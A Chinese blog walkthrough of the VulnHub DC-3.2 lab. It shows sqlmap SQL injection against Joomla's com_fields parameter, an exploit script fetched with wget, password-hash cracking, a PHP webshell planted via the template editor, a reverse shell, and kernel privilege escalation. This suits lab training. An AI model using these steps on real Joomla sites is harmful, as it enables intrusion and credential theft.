vulnhub DC:3.2渗透笔记

最新推荐文章于 2024-07-21 10:17:51 发布
最新推荐文章于 2024-07-21 10:17:51 发布
阅读量459 收藏
点赞数 1
分类专栏: vulnhub靶机渗透 文章标签: php 安全 linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_52268949/article/details/130186901
版权

kali ip :192.168.20.130

靶机下载地址:https://www.vulnhub.com/entry/dc-32,312/

信息收集

扫描靶机ip以及开放端口
在这里插入图片描述
在这里插入图片描述
开放了80端口访问一下

在这里插入图片描述

Welcome to DC-3.
This time, there is only one flag, one entry point and no clues.
To get the flag, you'll obviously have to gain root privileges.
How you get to be root is up to you - and, obviously, the system.
Good luck - and I hope you enjoy this little challenge.  :-)

欢迎来到 DC-3。
这一次,只有一面旗帜,一个入口,没有任何线索。
要获得flag,您显然必须获得 root 权限。
如何成为 root 取决于您——当然,也取决于系统。
祝你好运 - 我希望你喜欢这个小挑战。 :-)

意思就是需要root权限了

查看Wapplayzer信息如下

在这里插入图片描述

使用的Joomla的CMS,使用joomscan(Joomla漏洞扫描器)扫描器扫描

joomscan --url http://192.168.20.129/

在这里插入图片描述

后台登录界面已发现

在这里插入图片描述

漏洞攻击

使用searchsploit搜索Joomla的漏洞

在这里插入图片描述

查看一下42033.txt文件

cat /usr/share/exploitdb/exploits/php/webapps/42033.txt

在这里插入图片描述

所以可以利用sqlmap进行注入

sqlmap -u "http://192.168.20.129/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering]

在这里插入图片描述

查看joomladb数据库

sqlmap -u "http://192.168.20.129/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D "joomladb" --tables -p list[fullordering]

在这里插入图片描述

有user表,查看#__users的列

sqlmap -u "http://192.168.20.129/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D "joomladb" -T "#__users" --columns -p list[fullordering]

在这里插入图片描述

查看表name和password的值

sqlmap -u "http://192.168.20.129/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D "joomladb" -T "#__users" -C "name,password" --dump -p list[fullordering]

得到加密密码

在这里插入图片描述

还有一种简单的方法,使用joomblash.py脚本

wget https://raw.githubusercontent.com/XiphosResearch/exploits/master/Joomblah/joomblah.py

直接攻击即可得到加密的密码

在这里插入图片描述

使用john爆破密码,我将密文内容放在1文件中

在这里插入图片描述

得到密码snoopy,登录到系统

在这里插入图片描述

此处发现可以新增页面
在这里插入图片描述

写入一句话

在这里插入图片描述

木马路径http://192.168.20.129/templates/beez3/shell.php

蚁剑连接

在这里插入图片描述

当前权限位www-data

在这里插入图片描述

编写反弹shell,监听1234端口,反弹shell至kali,shell内容用的kali自带的位于/usr/share/webshells/php/php-reverse-shell.php并且修改参数
在这里插入图片描述
在这里插入图片描述

连接成功,写入交互式shell:

python -c 'import pty;pty.spawn("/bin/bash")'

在这里插入图片描述

提权

使用uname -a发现是ubuntu16.04

在这里插入图片描述

使用searchsploit发现一个漏洞可以提权

在这里插入图片描述

查看txt文件

在这里插入图片描述

将压缩包下载下来上传服务器解压运行即可(这里我偷几张图,我没科学上网工具……)

在这里插入图片描述

在这里插入图片描述
在这里插入图片描述

听门外雪花飞
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
vulnhub靶场库中 DC:1
07-06
DC:1是Vulnhub靶场库中的一个特定靶机,它旨在帮助用户学习和掌握基础的渗透测试技巧和漏洞利用。 2. **实验环境配置** 在进行渗透测试之前,需要搭建实验环境。这里使用了Vmware Workstation 16作为虚拟机软件,...
Vulnhub靶机渗透测试 DC-8靶机
12-07
Vulnhub靶机渗透测试 DC-8靶机
渗透DC-1靶机笔记
qq_43571759的博客
03-08 1396
网上有许多教程不完整而且不怎么细腻,对我们小白很不友好,今天刷完这个靶机马上拿小本本记下来。 vulnhub是一个特别好的渗透测试实战网站,里面有许多靶机可以下载,也是小白必刷靶机,比如我,下载地址: https://www.vulnhub.com/entry/dc-1-1,292/ 所需环境和网络要求: VMware kali vulnhub-DC-1靶机 两台主机都设置为nat模式 第一步要干...
Vulnhub_DC-3靶机渗透测试
m0_66225311的博客
09-20 124
对网站进行渗透测试,一定不能忘记目录扫描,查看是否能找到后台登录地址对于后台登录可以先尝试爆破登录使用插件获取了cms框架,可以去找一下历史漏洞,进行利用可以利用网上给出的payload 但也不要忘记msf的强大的漏洞利用功能 可能就会利用该漏洞获取shell当然登录了后台地址 也可以尝试搜索一下cms框架后台获取shell的方法反弹shell如果常用命令和代码不成功 可以使用msf生成的木马进行监听上线。
vuInhub靶场实战系列--bulldog-1
weixin_45221204的博客
06-03 1193
Vulnhub是一个提供各种漏洞环境的靶场平台,大部分环境是做好的虚拟机镜像文件,镜像预先设计了多种漏洞。本文介绍bulldog-1靶机渗透测试,内容包括主机扫描(nmap\netdiscover)、端口扫描(nmap\masscan)、目录扫描(dirb\dirsearch)MD5在线解码、netcat、反弹shell、linux内核提权等内容。😃使用nmap进行主机发现和端口扫描使用dirbsearch进行目录扫描MD5解密netcat监听反弹shell。
Vulnhub-dc6
weixin_44770698的博客
01-27 791
靶场练习-47
VulnHub渗透测试靶场- DC-8
11-21
DC-8 是另一个专门建造的易受攻击的实验室,旨在获得渗透测试领域的经验。 这个挑战有点像实际挑战和“概念验证”,即在 Linux 上安装和配置的双因素身份验证是否可以防止 Linux 服务器被利用。 此挑战的“概念...
VulnHub 渗透测试靶场 -DC-9
11-21
DC-9 是另一个专门建造的易受攻击的实验室,旨在获得渗透测试领域的经验。 这一挑战的最终目标是扎根并读取唯一的标志。 Linux 技能和熟悉 Linux 命令行是必须的,还有一些基本渗透测试工具的经验。 对于初学者来...
Vulnhub靶机渗透测试 DC-3靶机
12-07
Vulnhub靶机渗透测试 DC-3靶机
PHP项目开发流程概述
api77的博客
07-19 490
需求分析是项目开发的起始点,主要目的是明确项目的目标、功能需求、用户群体等。这一阶段通常通过用户访谈、市场调研、竞品分析等方式进行。
【Docker】Docker-compose 单机容器集群编排工具
F12138X的博客
07-18 1568
顽强的毅力可以征服世界上任何一座高峰
全新UI自助图文打印系统小程序源码/自助云打印机前后端源码
12年全栈程序开发
07-17 343
这些服务覆盖了多种文件格式,包括文档、图片、表格等。除此之外,系统还集成了额外的特色功能,如美颜、换装以及文档打印等,以满足用户的不同需求。管理员可进管理后台对打印机进行管理。最新的自助图文打印系统和证件照云打印小程序源码采用了PHP作为后端开发语言,旨在为用户提供全面的自助打印服务。
阿里云短信PHP集成api类
༺墨༒眉༻
07-17 308
无需安装sdk扩展包,直接引入类即可使用。
深入理解Linux网络(一):内核如何接收网络包
又见南风的博客
07-18 859
在上⾯的代码中跟踪函数调⽤, __igb_open => igb_request_irq => igb_request_msix , 在 igb_request_msix 中我们看到了,对于多队列的⽹卡,为每⼀个队列都注册了中断,其对应的中断处理函数是 igb_msix_ring(该函数也在 drivers/net/ethernet/intel/igb/igb_main.c 下)。如协议注册⼩节看到 inet_protos 中保存着 tcp_v4_rcv() 和 udp_rcv() 的函数地址。
[web]-反序列化-绕过__wakeup(转)
mails2008的专栏
07-18 378
终点:很直接是echo $flag,在__destruct中,username==='admin' 和 password==100。反序列化过程中发现起点在终点之前调用,反而是捣乱的,那我们就不需要自动执行__wakeup,绕过的方法,设置的字段数量比实际字段大的值。其实简单的很简单,难得也很难,慢慢学习就好,没必要焦虑,觉得很难,纯粹一个兴趣爱好就行。起点:_wakeup函数中是$this->username='guest',是给赋值;按照常规思路,寻找起点、终点、跳板。
Linux(CentOS7)部署PHP-7.2.17源码包
thetender的博客
07-18 1090
LAMP系统安装 通过PHP的源码包部署PHP-7.2.17版本
thinkphp8结合layui2.9 图片上传验证
最新发布
quweiie的专栏
07-21 193
thinkphp8图片上传的验证
navicat15已连接忘记密码
07-17 252
2.使用文本打开 connections.ncx。3.复制加密密码,在线解密。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值